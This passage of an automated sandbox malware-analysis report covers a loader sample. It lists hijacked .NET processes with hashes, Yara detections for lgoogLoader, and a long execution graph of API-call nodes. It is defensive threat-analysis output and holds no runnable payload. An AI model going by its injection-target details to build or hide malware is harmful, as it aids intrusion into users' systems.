                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                              Imagebase:0x7ff70b2d0000
                                              File size:128584 bytes
                                              MD5 hash:B00E9325AC7356A3F4864EAAAD48E13F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:3
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                              Imagebase:0x192514e0000
                                              File size:54888 bytes
                                              MD5 hash:7809A19AA8DA1A41F36B60B0664C4E20
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:4
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                              Imagebase:0x26a0fa80000
                                              File size:44640 bytes
                                              MD5 hash:59FCE79E9D81AB9E2ED4C3561205F5DF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:5
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                              Imagebase:0x201b9ef0000
                                              File size:24160 bytes
                                              MD5 hash:48FD4DD682051712E3E7757C525DED71
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:6
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
                                              Imagebase:0x29622630000
                                              File size:44648 bytes
                                              MD5 hash:BF7E443F1E1FA88AD5A2A5EB44F42834
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:7
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
                                              Imagebase:0x9b0000
                                              File size:42080 bytes
                                              MD5 hash:F2A47587431C466535F3C3D3427724BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                              • Rule: JoeSecurity_lGoogLoader, Description: Yara detected lgoogLoader, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high

                                              Execution Graph

                                              Execution Coverage

                                              Dynamic/Packed Code Coverage

                                              Signature Coverage

                                              Execution Coverage:5.5%
                                              Dynamic/Decrypted Code Coverage:24%
                                              Signature Coverage:12.8%
                                              Total number of Nodes:1311
                                              Total number of Limit Nodes:4
                                              Show Legend
                                              Hide Nodes/Edges
                                              execution_graph 6809 403c00 6811 403bcf 6809->6811 6813 403c1b __lseeki64 6809->6813 6810 403c41 6811->6813 6816 403c49 6811->6816 6813->6810 6814 403e4e VirtualAlloc 6813->6814 6815 403e6c 6814->6815 6817 403cee 6816->6817 6818 403cd0 __lseeki64 6816->6818 6819 403e4e VirtualAlloc 6818->6819 6820 403e6c 6819->6820 8261 4039c0 8305 404a88 8261->8305 8263 4039cc GetStartupInfoA GetProcessHeap HeapAlloc 8264 403a0b GetVersionExA 8263->8264 8265 4039fe 8263->8265 8266 403a29 GetProcessHeap HeapFree 8264->8266 8267 403a1b GetProcessHeap HeapFree 8264->8267 8306 40395b 8265->8306 8269 403a55 8266->8269 8270 403a05 __freefls@4 8267->8270 8314 403d88 8269->8314 8305->8263 8307 403964 8306->8307 8308 403969 8306->8308 8309 406e85 __FF_MSGBANNER 24 API calls 8307->8309 8310 406ce5 __amsg_exit 24 API calls 8308->8310 8309->8308 8311 403972 8310->8311 8312 406a13 _malloc 3 API calls 8311->8312 8313 40397c 8312->8313 8313->8270 8315 403daa __lseeki64 8314->8315 8316 403e4e VirtualAlloc 8315->8316 8317 403e6c 8316->8317 8328 403ba0 8329 403bcf 8328->8329 8330 403c49 VirtualAlloc 8329->8330 8332 403c1b __lseeki64 8329->8332 8330->8329 8331 403c41 8332->8331 8333 403e4e VirtualAlloc 8332->8333 8334 403e6c 8333->8334 7380 408c01 7381 408c0e 7380->7381 7386 407c87 7381->7386 7384 407c87 __calloc_crt 8 API calls 7385 408c41 7384->7385 7388 407c8b 7386->7388 7389 407cca 7388->7389 7390 407cab Sleep 7388->7390 7391 40b3af 7388->7391 7389->7384 7389->7385 7390->7388 7392 40b3bb __freefls@4 7391->7392 7393 40b3d3 7392->7393 7400 40b3f2 _memset ___sbh_alloc_block __calloc_impl __freefls@4 7392->7400 7394 403ce9 __lseeki64 VirtualAlloc 7393->7394 7395 40b3d8 7394->7395 7401 4057fc 7395->7401 7397 40b464 HeapAlloc 7397->7400 7398 40b3e8 __freefls@4 7398->7388 7400->7397 7400->7398 7404 406ec8 7400->7404 7407 406443 TlsGetValue 7401->7407 7403 40580a __invoke_watson 7405 406443 __amsg_exit 6 API calls 7404->7405 7406 406ed3 7405->7406 7406->7400 7408 406456 7407->7408 7409 406477 GetModuleHandleA 7407->7409 7408->7409 7410 406460 TlsGetValue 7408->7410 7411 406488 7409->7411 7412 40646f 7409->7412 7414 40646b 7410->7414 7417 406360 7411->7417 7412->7403 7414->7409 7414->7412 7415 40648d 7415->7412 7416 406491 GetProcAddress 7415->7416 7416->7412 7422 406aa9 7417->7422 7419 40637b 7420 406386 GetModuleHandleA 7419->7420 7421 406382 __initp_misc_cfltcvt_tab 7419->7421 7420->7421 7421->7415 7423 406ab4 7422->7423 7424 406ad9 7423->7424 7425 403ce9 __lseeki64 VirtualAlloc 7423->7425 7424->7419 7426 406ab9 7425->7426 7427 4057fc __lseeki64 6 API calls 7426->7427 7428 406ac9 7427->7428 7428->7419 8184 403b61 8185 403b70 8184->8185 8186 403b76 8184->8186 8187 406c6a _abort 13 API calls 8185->8187 8189 403b7b __freefls@4 8186->8189 8190 406c8a 8186->8190 8187->8186 8191 406b77 _abort 13 API calls 8190->8191 8192 406c95 8191->8192 8192->8189 8258 40c125 8259 4069c9 __amsg_exit 24 API calls 8258->8259 8260 40c12c 8259->8260 7185 40b868 RtlUnwind 7448 407acc 7449 407afc GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 7448->7449 7450 407aef 7448->7450 7451 407af3 7449->7451 7450->7449 7450->7451 8018 403b4d 8021 407228 8018->8021 8022 4065e8 _raise 28 API calls 8021->8022 8023 403b5e 8022->8023 7674 404af0 7677 404b1b __except_handler4 __cinit setSBUpLow 7674->7677 7675 404b94 __except_handler4 setSBUpLow 7677->7675 7679 4081aa RtlUnwind 7677->7679 7678 404c14 __except_handler4 setSBUpLow @_EH4_CallFilterFunc@8 7679->7678 8024 401d50 8025 401d84 8024->8025 8026 401f3b 8024->8026 8029 401d8a 8025->8029 8030 401ecb 8025->8030 8027 401f42 8026->8027 8028 401f7d ChildWindowFromPoint 8026->8028 8031 401fda DefWindowProcW 8027->8031 8032 401f4b ChildWindowFromPoint 8027->8032 8033 401fa4 InvalidateRect 8028->8033 8037 401fc1 SetCursor 8028->8037 8035 401dae EndDialog PostQuitMessage 8029->8035 8041 401dc4 6 API calls 8029->8041 8042 401d96 8029->8042 8030->8031 8034 401ed7 SetBkMode GetSysColorBrush 8030->8034 8040 401ff8 setSBUpLow 8031->8040 8032->8031 8036 401f64 ShellExecuteW 8032->8036 8033->8037 8038 401ef9 8034->8038 8039 401eee GetSysColor 8034->8039 8035->8031 8036->8031 8037->8031 8045 401efe SetTextColor 8038->8045 8039->8045 8055 40354a 8041->8055 8042->8031 8042->8035 8047 401f13 8045->8047 8048 401f18 SelectObject GetSysColorBrush 8045->8048 8046 401e38 GetFileVersionInfoW 8072 401d00 VerQueryValueW 8046->8072 8047->8048 8049 401f35 setSBUpLow 8048->8049 8052 401d00 88 API calls 8053 401e71 SetDlgItemTextW GetModuleHandleW LoadCursorW LoadCursorW ShowWindow 8052->8053 8054 401ec5 setSBUpLow 8053->8054 8056 4035f7 8055->8056 8066 403558 _malloc 8055->8066 8057 406ec8 _malloc 6 API calls 8056->8057 8058 4035fd 8057->8058 8060 403ce9 __lseeki64 VirtualAlloc 8058->8060 8059 406e85 __FF_MSGBANNER 24 API calls 8059->8066 8061 403603 8060->8061 8061->8046 8062 406ce5 __amsg_exit 24 API calls 8062->8066 8063 4035bb HeapAlloc 8063->8066 8064 406a13 _malloc 3 API calls 8064->8066 8065 4035ee 8065->8046 8066->8059 8066->8062 8066->8063 8066->8064 8066->8065 8067 4035e2 8066->8067 8068 406ec8 _malloc 6 API calls 8066->8068 8070 4035e0 8066->8070 8069 403ce9 __lseeki64 VirtualAlloc 8067->8069 8068->8066 8069->8070 8071 403ce9 __lseeki64 VirtualAlloc 8070->8071 8071->8065 8075 401c30 8072->8075 8074 401d3f SetDlgItemTextW 8074->8052 8079 4032bd 8075->8079 8078 401cc7 setSBUpLow 8078->8074 8082 405916 8079->8082 8083 405921 8082->8083 8084 40593e 8082->8084 8085 403ce9 __lseeki64 VirtualAlloc 8083->8085 8086 40594b 8084->8086 8088 405958 8084->8088 8087 405926 8085->8087 8089 403ce9 __lseeki64 VirtualAlloc 8086->8089 8090 4057fc __lseeki64 6 API calls 8087->8090 8097 405820 8088->8097 8091 405950 8089->8091 8095 401ca1 VerQueryValueW 8090->8095 8094 4057fc __lseeki64 6 API calls 8091->8094 8094->8095 8095->8078 8096 403ce9 __lseeki64 VirtualAlloc 8096->8091 8098 40584e 8097->8098 8099 40582e 8097->8099 8102 40585e 8098->8102 8108 40587e 8098->8108 8100 403ce9 __lseeki64 VirtualAlloc 8099->8100 8101 405833 8100->8101 8103 4057fc __lseeki64 6 API calls 8101->8103 8104 403ce9 __lseeki64 VirtualAlloc 8102->8104 8107 405843 8103->8107 8105 405863 8104->8105 8106 4057fc __lseeki64 6 API calls 8105->8106 8106->8107 8107->8095 8107->8096 8108->8107 8110 4058c5 8108->8110 8112 404c86 8108->8112 8110->8107 8111 404c86 __flsbuf 86 API calls 8110->8111 8111->8107 8113 408d9c __flsbuf 6 API calls 8112->8113 8114 404c94 8113->8114 8115 404cb6 8114->8115 8116 404c9f 8114->8116 8118 404cba 8115->8118 8120 404cc7 __flsbuf 8115->8120 8117 403ce9 __lseeki64 VirtualAlloc 8116->8117 8127 404ca4 8117->8127 8119 403ce9 __lseeki64 VirtualAlloc 8118->8119 8119->8127 8126 408b9d __write_nolock 6 API calls 8120->8126 8120->8127 8129 404d1c 8120->8129 8132 404d27 8120->8132 8121 404db5 8123 408a7d __locking 81 API calls 8121->8123 8122 404d35 8124 404d4c 8122->8124 8128 404d69 8122->8128 8123->8127 8125 408a7d __locking 81 API calls 8124->8125 8125->8127 8126->8129 8127->8110 8128->8127 8136 40839e 8128->8136 8129->8132 8133 408b59 8129->8133 8132->8121 8132->8122 8168 407c47 8133->8168 8137 4083aa __freefls@4 8136->8137 8138 4083d7 8137->8138 8139 4083bb 8137->8139 8141 4083e5 8138->8141 8143 408406 8138->8143 8140 403cfc __lseeki64 VirtualAlloc 8139->8140 8142 4083c0 8140->8142 8144 403cfc __lseeki64 VirtualAlloc 8141->8144 8147 403ce9 __lseeki64 VirtualAlloc 8142->8147 8145 408426 8143->8145 8146 40844c 8143->8146 8148 4083ea 8144->8148 8149 403cfc __lseeki64 VirtualAlloc 8145->8149 8151 40ba91 __lseeki64 18 API calls 8146->8151 8150 4083c8 __freefls@4 8147->8150 8152 403ce9 __lseeki64 VirtualAlloc 8148->8152 8153 40842b 8149->8153 8150->8127 8154 408452 8151->8154 8155 4083f1 8152->8155 8157 403ce9 __lseeki64 VirtualAlloc 8153->8157 8158 40847b 8154->8158 8159 40845f 8154->8159 8156 4057fc __lseeki64 6 API calls 8155->8156 8156->8150 8161 408432 8157->8161 8160 403ce9 __lseeki64 VirtualAlloc 8158->8160 8162 40831b __lseeki64_nolock 9 API calls 8159->8162 8163 408480 8160->8163 8164 4057fc __lseeki64 6 API calls 8161->8164 8165 408470 8162->8165 8166 403cfc __lseeki64 VirtualAlloc 8163->8166 8164->8150 8173 4084ad 8165->8173 8166->8165 8171 407c4b 8168->8171 8169 40354a _malloc 28 API calls 8169->8171 8170 407c82 8170->8132 8171->8169 8171->8170 8172 407c63 Sleep 8171->8172 8172->8171 8176 40bb31 LeaveCriticalSection 8173->8176 8175 4084b5 8175->8150 8176->8175 8194 401310 8195 401343 8194->8195 8196 4013be 8194->8196 8198 401348 8195->8198 8199 40136a 8195->8199 8222 401220 8196->8222 8201 40134d GetDlgItem 8198->8201 8211 401383 setSBUpLow 8198->8211 8202 4013b0 EndDialog 8199->8202 8203 401377 8199->8203 8205 40135d GetSysColorBrush 8201->8205 8201->8211 8202->8211 8206 4013a2 EndDialog 8203->8206 8207 40137c 8203->8207 8205->8211 8206->8211 8209 40138a GetDlgItem 8207->8209 8207->8211 8213 401000 8209->8213 8210 403199 ___free_lc_time 4 API calls 8210->8211 8214 409280 _memset 8213->8214 8215 40101c GetModuleHandleW PrintDlgW 8214->8215 8216 401054 6 API calls 8215->8216 8217 40104e 8215->8217 8218 409280 _memset 8216->8218 8217->8211 8219 4010b8 7 API calls 8218->8219 8220 4011b5 StartPage SendMessageW EndPage 8219->8220 8221 4011ee SendMessageW EndDoc SetCursor 8219->8221 8220->8220 8220->8221 8221->8211 8223 401234 8222->8223 8224 40354a _malloc 28 API calls 8223->8224 8225 401258 8224->8225 8226 403227 8225->8226 8227 403252 8226->8227 8228 403235 8226->8228 8227->8228 8229 403259 8227->8229 8230 403ce9 __lseeki64 VirtualAlloc 8228->8230 8239 404de6 8229->8239 8232 40323a 8230->8232 8234 4057fc __lseeki64 6 API calls 8232->8234 8233 40327f 8235 403289 8233->8235 8236 404c86 __flsbuf 86 API calls 8233->8236 8237 4013f2 SetWindowTextW GetDlgItem SendMessageW GetDlgItem SendMessageW 8234->8237 8235->8237 8238 404c86 __flsbuf 86 API calls 8235->8238 8236->8235 8237->8210 8238->8237 8240 4032d9 _LocaleUpdate::_LocaleUpdate 56 API calls 8239->8240 8241 404e41 8240->8241 8242 404e46 8241->8242 8251 404e77 __aulldvrm __woutput_l _strlen 8241->8251 8243 403ce9 __lseeki64 VirtualAlloc 8242->8243 8244 404e4b 8243->8244 8245 4057fc __lseeki64 6 API calls 8244->8245 8246 404e5b setSBUpLow 8245->8246 8246->8233 8247 4092fa 88 API calls _write_multi_char 8247->8251 8248 403199 ___free_lc_time 4 API calls 8248->8251 8249 406443 6 API calls __amsg_exit 8249->8251 8250 409344 88 API calls _write_string 8250->8251 8251->8246 8251->8247 8251->8248 8251->8249 8251->8250 8252 409195 __isleadbyte_l 56 API calls 8251->8252 8253 407c47 __malloc_crt 29 API calls 8251->8253 8254 405697 8251->8254 8256 40931f 88 API calls _write_multi_char 8251->8256 8257 40906b 56 API calls __woutput_l 8251->8257 8252->8251 8253->8251 8255 403ce9 __lseeki64 VirtualAlloc 8254->8255 8255->8244 8256->8251 8257->8251 7686 4064b1 TlsAlloc 7687 408cb2 7694 40be32 7687->7694 7690 408cc5 7692 403199 ___free_lc_time 4 API calls 7690->7692 7693 408cd0 7692->7693 7703 40bd58 7694->7703 7696 408cb7 7696->7690 7697 40bc15 7696->7697 7698 40bc21 __freefls@4 7697->7698 7699 40bc6b DeleteCriticalSection 7698->7699 7700 40bc96 __fcloseall __freefls@4 7698->7700 7718 40c798 7698->7718 7702 403199 ___free_lc_time 4 API calls 7699->7702 7700->7690 7702->7698 7708 40bd64 __freefls@4 7703->7708 7705 40be0b _flsall __freefls@4 7705->7696 7707 40bd16 85 API calls _flsall 7707->7708 7708->7705 7708->7707 7709 408d0e 7708->7709 7712 40bdfa 7708->7712 7710 408d2d EnterCriticalSection 7709->7710 7711 408d17 __freefls@4 7709->7711 7710->7708 7711->7708 7715 408d72 7712->7715 7714 40be08 7714->7708 7716 408d91 LeaveCriticalSection 7715->7716 7717 408d7f __freefls@4 7715->7717 7716->7714 7717->7714 7719 40c7a4 __freefls@4 7718->7719 7720 40c7d5 7719->7720 7721 40c7b8 7719->7721 7727 40c7cd __freefls@4 7720->7727 7731 408cd2 7720->7731 7722 403ce9 __lseeki64 VirtualAlloc 7721->7722 7724 40c7bd 7722->7724 7726 4057fc __lseeki64 6 API calls 7724->7726 7725 40c7ed 7735 40c726 7725->7735 7726->7727 7727->7698 7732 408ce0 7731->7732 7733 408d02 EnterCriticalSection 7731->7733 7732->7733 7734 408ce8 __freefls@4 7732->7734 7733->7725 7734->7725 7736 40c752 7735->7736 7737 40c736 7735->7737 7738 40c74b 7736->7738 7754 40bcb4 7736->7754 7739 403ce9 __lseeki64 VirtualAlloc 7737->7739 7751 40c80c 7738->7751 7741 40c73b 7739->7741 7743 4057fc __lseeki64 6 API calls 7741->7743 7743->7738 7747 40c76c 7771 40ccfb 7747->7771 7749 40c772 7749->7738 7750 403199 ___free_lc_time 4 API calls 7749->7750 7750->7738 8014 408d3c 7751->8014 7753 40c812 7753->7727 7755 40bcea 7754->7755 7756 40bcc9 7754->7756 7760 40cdc8 7755->7760 7756->7755 7757 408d9c __flsbuf 6 API calls 7756->7757 7758 40bce3 7757->7758 7794 408a7d 7758->7794 7761 40c766 7760->7761 7762 40cdd4 7760->7762 7764 408d9c 7761->7764 7762->7761 7763 403199 ___free_lc_time 4 API calls 7762->7763 7763->7761 7765 408dc4 7764->7765 7766 408da7 7764->7766 7765->7747 7767 403ce9 __lseeki64 VirtualAlloc 7766->7767 7768 408dac 7767->7768 7769 4057fc __lseeki64 6 API calls 7768->7769 7770 408dbc 7769->7770 7770->7747 7772 40cd07 __freefls@4 7771->7772 7773 40cd2a 7772->7773 7774 40cd0f 7772->7774 7776 40cd38 7773->7776 7779 40cd79 7773->7779 7775 403cfc __lseeki64 VirtualAlloc 7774->7775 7777 40cd14 7775->7777 7778 403cfc __lseeki64 VirtualAlloc 7776->7778 7780 403ce9 __lseeki64 VirtualAlloc 7777->7780 7781 40cd3d 7778->7781 7782 40ba91 __lseeki64 18 API calls 7779->7782 7783 40cd1c __freefls@4 7780->7783 7784 403ce9 __lseeki64 VirtualAlloc 7781->7784 7785 40cd7f 7782->7785 7783->7749 7786 40cd44 7784->7786 7787 40cd9a 7785->7787 7788 40cd8c 7785->7788 7789 4057fc __lseeki64 6 API calls 7786->7789 7791 403ce9 __lseeki64 VirtualAlloc 7787->7791 7988 40cc67 7788->7988 7789->7783 7792 40cd94 7791->7792 8001 40cdbe 7792->8001 7795 408a89 __freefls@4 7794->7795 7796 408a91 7795->7796 7797 408aac 7795->7797 7819 403cfc 7796->7819 7799 408aba 7797->7799 7802 408afb 7797->7802 7801 403cfc __lseeki64 VirtualAlloc 7799->7801 7804 408abf 7801->7804 7823 40ba91 7802->7823 7806 403ce9 __lseeki64 VirtualAlloc 7804->7806 7808 408ac6 7806->7808 7807 408b01 7810 408b24 7807->7810 7811 408b0e 7807->7811 7809 4057fc __lseeki64 6 API calls 7808->7809 7812 408a9e __freefls@4 7809->7812 7814 403ce9 __lseeki64 VirtualAlloc 7810->7814 7829 4084b7 7811->7829 7812->7755 7816 408b29 7814->7816 7815 408b1c 7881 408b4f 7815->7881 7817 403cfc __lseeki64 VirtualAlloc 7816->7817 7817->7815 7820 403d12 __lseeki64 7819->7820 7821 403e4e VirtualAlloc 7820->7821 7822 403e6c 7821->7822 7826 40ba9d __freefls@4 7823->7826 7824 40bafd EnterCriticalSection 7825 40bb1a __freefls@4 7824->7825 7825->7807 7827 40bae0 __lseeki64 7826->7827 7884 407b82 7826->7884 7827->7824 7827->7825 7830 4084f3 7829->7830 7837 4084ec setSBUpLow 7829->7837 7831 4084f7 7830->7831 7832 40851e 7830->7832 7833 403cfc __lseeki64 VirtualAlloc 7831->7833 7834 408588 7832->7834 7835 408562 7832->7835 7836 4084fc 7833->7836 7839 40859a 7834->7839 7897 40831b 7834->7897 7838 403cfc __lseeki64 VirtualAlloc 7835->7838 7840 403ce9 __lseeki64 VirtualAlloc 7836->7840 7837->7815 7841 408567 7838->7841 7905 408b9d 7839->7905 7843 408503 7840->7843 7845 403ce9 __lseeki64 VirtualAlloc 7841->7845 7846 4057fc __lseeki64 6 API calls 7843->7846 7849 408570 7845->7849 7846->7837 7847 4085a3 7848 4087a2 7847->7848 7915 40665f 7847->7915 7851 4087b0 7848->7851 7852 4089d5 WriteFile 7848->7852 7850 4057fc __lseeki64 6 API calls 7849->7850 7850->7837 7855 408853 7851->7855 7863 4087c2 7851->7863 7854 4089fc GetLastError 7852->7854 7857 40879d 7852->7857 7854->7857 7868 40885d 7855->7868 7873 4088fa 7855->7873 7857->7837 7858 408a36 7857->7858 7866 408a16 7857->7866 7858->7837 7861 403ce9 __lseeki64 VirtualAlloc 7858->7861 7859 4085e2 7859->7848 7862 4085f0 GetConsoleCP 7859->7862 7860 40880d WriteFile 7860->7854 7860->7863 7864 408a23 7861->7864 7862->7857 7877 408610 7862->7877 7863->7857 7863->7858 7863->7860 7870 403cfc __lseeki64 VirtualAlloc 7864->7870 7865 408950 WideCharToMultiByte 7865->7854 7869 408983 WriteFile 7865->7869 7866->7837 7871 403ce9 __lseeki64 VirtualAlloc 7866->7871 7867 4088b0 WriteFile 7867->7854 7867->7868 7868->7857 7868->7858 7868->7867 7872 4089b1 GetLastError 7869->7872 7869->7873 7870->7837 7871->7864 7872->7873 7873->7857 7873->7858 7873->7865 7873->7869 7875 40917e 56 API calls __write_nolock 7875->7877 7876 408688 WideCharToMultiByte 7876->7857 7878 4086b6 WriteFile 7876->7878 7877->7854 7877->7857 7877->7875 7877->7876 7879 40bb53 6 API calls __putwch_nolock 7877->7879 7880 4086ef WriteFile 7877->7880 7920 4091cb 7877->7920 7878->7854 7878->7877 7879->7877 7880->7854 7880->7877 7987 40bb31 LeaveCriticalSection 7881->7987 7883 408b57 7883->7812 7885 407b8e __freefls@4 7884->7885 7886 406443 __amsg_exit 6 API calls 7885->7886 7887 407b9e 7886->7887 7888 406a72 ___crtInitCritSecAndSpinCount 6 API calls 7887->7888 7894 407bf2 __freefls@4 7887->7894 7889 407bae 7888->7889 7891 405700 __invoke_watson 5 API calls 7889->7891 7895 407bbd 7889->7895 7890 407bc6 GetModuleHandleA 7892 407bd5 GetProcAddress 7890->7892 7893 407be7 7890->7893 7891->7895 7892->7893 7896 4063cc __initp_misc_cfltcvt_tab 10 API calls 7893->7896 7894->7827 7895->7890 7895->7893 7896->7894 7923 40ba20 7897->7923 7899 408337 7900 408350 SetFilePointer 7899->7900 7901 40833f 7899->7901 7903 408368 GetLastError 7900->7903 7904 408344 7900->7904 7902 403ce9 __lseeki64 VirtualAlloc 7901->7902 7902->7904 7903->7904 7904->7839 7906 408ba6 7905->7906 7908 408bb4 7905->7908 7907 403ce9 __lseeki64 VirtualAlloc 7906->7907 7909 408bab 7907->7909 7910 408bdf 7908->7910 7911 403ce9 __lseeki64 VirtualAlloc 7908->7911 7909->7847 7910->7847 7912 408bc8 7911->7912 7913 4057fc __lseeki64 6 API calls 7912->7913 7914 408bd8 7913->7914 7914->7847 7916 4065e8 _raise 28 API calls 7915->7916 7917 406665 7916->7917 7919 406672 GetConsoleMode 7917->7919 7937 4069c9 7917->7937 7919->7848 7919->7859 7953 409195 7920->7953 7924 40ba40 7923->7924 7925 40ba29 7923->7925 7927 403cfc __lseeki64 VirtualAlloc 7924->7927 7929 40ba8d 7924->7929 7926 403cfc __lseeki64 VirtualAlloc 7925->7926 7928 40ba2e 7926->7928 7930 40ba6e 7927->7930 7931 403ce9 __lseeki64 VirtualAlloc 7928->7931 7929->7899 7932 403ce9 __lseeki64 VirtualAlloc 7930->7932 7933 40ba36 7931->7933 7934 40ba75 7932->7934 7933->7899 7935 4057fc __lseeki64 6 API calls 7934->7935 7936 40ba85 7935->7936 7936->7899 7944 406e85 7937->7944 7940 406ce5 __amsg_exit 24 API calls 7941 4069d7 7940->7941 7942 406443 __amsg_exit 6 API calls 7941->7942 7943 4069e2 7942->7943 7943->7919 7945 40b0dd __FF_MSGBANNER 6 API calls 7944->7945 7946 406e8c 7945->7946 7947 406e99 7946->7947 7948 40b0dd __FF_MSGBANNER 6 API calls 7946->7948 7949 406ce5 __amsg_exit 24 API calls 7947->7949 7951 4069ce 7947->7951 7948->7947 7950 406eb1 7949->7950 7952 406ce5 __amsg_exit 24 API calls 7950->7952 7951->7940 7952->7951 7956 4032d9 7953->7956 7957 4032e8 7956->7957 7961 403335 7956->7961 7958 40665f _LocaleUpdate::_LocaleUpdate 46 API calls 7957->7958 7959 4032ed 7958->7959 7960 403315 7959->7960 7964 4062ea 7959->7964 7960->7961 7975 405bab 7960->7975 7961->7877 7965 4062f6 __freefls@4 7964->7965 7966 40665f _LocaleUpdate::_LocaleUpdate 46 API calls 7965->7966 7967 4062fb 7966->7967 7968 406329 __freefls@4 7967->7968 7969 40630d 7967->7969 7971 4062ac _LocaleUpdate::_LocaleUpdate 20 API calls 7968->7971 7970 40665f _LocaleUpdate::_LocaleUpdate 46 API calls 7969->7970 7972 406312 _LocaleUpdate::_LocaleUpdate 7970->7972 7971->7972 7973 406320 __freefls@4 7972->7973 7974 4069c9 __amsg_exit 24 API calls 7972->7974 7973->7960 7974->7973 7976 405bb7 __freefls@4 7975->7976 7977 40665f _LocaleUpdate::_LocaleUpdate 46 API calls 7976->7977 7978 405bbc __freefls@4 7977->7978 7979 405bce _LocaleUpdate::_LocaleUpdate 7978->7979 7981 405c03 InterlockedDecrement 7978->7981 7982 405c1d InterlockedIncrement 7978->7982 7980 405bdc __freefls@4 7979->7980 7983 4069c9 __amsg_exit 24 API calls 7979->7983 7980->7961 7981->7982 7984 405c0e 7981->7984 7982->7979 7983->7980 7984->7982 7985 403199 ___free_lc_time HeapFree GetLastError VirtualAlloc VirtualAlloc 7984->7985 7986 405c1c 7985->7986 7986->7982 7987->7883 7989 40ba20 __lseeki64_nolock 7 API calls 7988->7989 7991 40cc73 7989->7991 7990 40ccc6 8004 40b99f 7990->8004 7991->7990 7993 40cca4 7991->7993 7994 40ba20 __lseeki64_nolock 7 API calls 7991->7994 7993->7990 7995 40ba20 __lseeki64_nolock 7 API calls 7993->7995 7996 40cc9b 7994->7996 7997 40ccb0 CloseHandle 7995->7997 7998 40ba20 __lseeki64_nolock 7 API calls 7996->7998 7997->7990 7999 40ccbc GetLastError 7997->7999 7998->7993 7999->7990 8000 40ccce 8000->7792 8013 40bb31 LeaveCriticalSection 8001->8013 8003 40cdc6 8003->7783 8005 40ba07 8004->8005 8006 40b9ac 8004->8006 8007 403ce9 __lseeki64 VirtualAlloc 8005->8007 8006->8005 8012 40b9d7 8006->8012 8008 40ba0c 8007->8008 8009 403cfc __lseeki64 VirtualAlloc 8008->8009 8010 40b9fd 8009->8010 8010->8000 8011 40b9f7 SetStdHandle 8011->8010 8012->8010 8012->8011 8013->8003 8015 408d67 LeaveCriticalSection 8014->8015 8016 408d49 8014->8016 8015->7753 8016->8015 8017 408d50 __freefls@4 8016->8017 8017->7753 8193 407b72 InitializeCriticalSection 7186 406677 7187 406683 __freefls@4 7186->7187 7188 40669b 7187->7188 7189 406777 __freefls@4 7187->7189 7212 403199 7187->7212 7191 4066a9 7188->7191 7192 403199 ___free_lc_time 4 API calls 7188->7192 7193 4066b7 7191->7193 7194 403199 ___free_lc_time 4 API calls 7191->7194 7192->7191 7195 403199 ___free_lc_time 4 API calls 7193->7195 7196 4066c5 7193->7196 7194->7193 7195->7196 7197 403199 ___free_lc_time 4 API calls 7196->7197 7199 4066d3 7196->7199 7197->7199 7198 4066e1 7201 4066f2 __freefls@4 7198->7201 7202 403199 ___free_lc_time 4 API calls 7198->7202 7199->7198 7200 403199 ___free_lc_time 4 API calls 7199->7200 7200->7198 7203 406706 InterlockedDecrement 7201->7203 7205 40671f __freefls@4 7201->7205 7202->7201 7204 406711 7203->7204 7203->7205 7204->7205 7206 403199 ___free_lc_time 4 API calls 7204->7206 7207 406764 __freefls@4 7205->7207 7220 406220 7205->7220 7206->7205 7209 403199 ___free_lc_time 4 API calls 7207->7209 7209->7189 7218 4031a5 _realloc __msize ___free_lc_time __freefls@4 7212->7218 7213 40321e __freefls@4 7213->7188 7214 4031f9 HeapFree 7214->7213 7215 40320b 7214->7215 7264 403ce9 7215->7264 7218->7213 7218->7214 7221 4062a8 7220->7221 7222 406229 InterlockedDecrement 7220->7222 7221->7207 7234 40605a 7221->7234 7223 406242 7222->7223 7224 40623f InterlockedDecrement 7222->7224 7225 40624c InterlockedDecrement 7223->7225 7226 40624f 7223->7226 7224->7223 7225->7226 7227 406259 InterlockedDecrement 7226->7227 7228 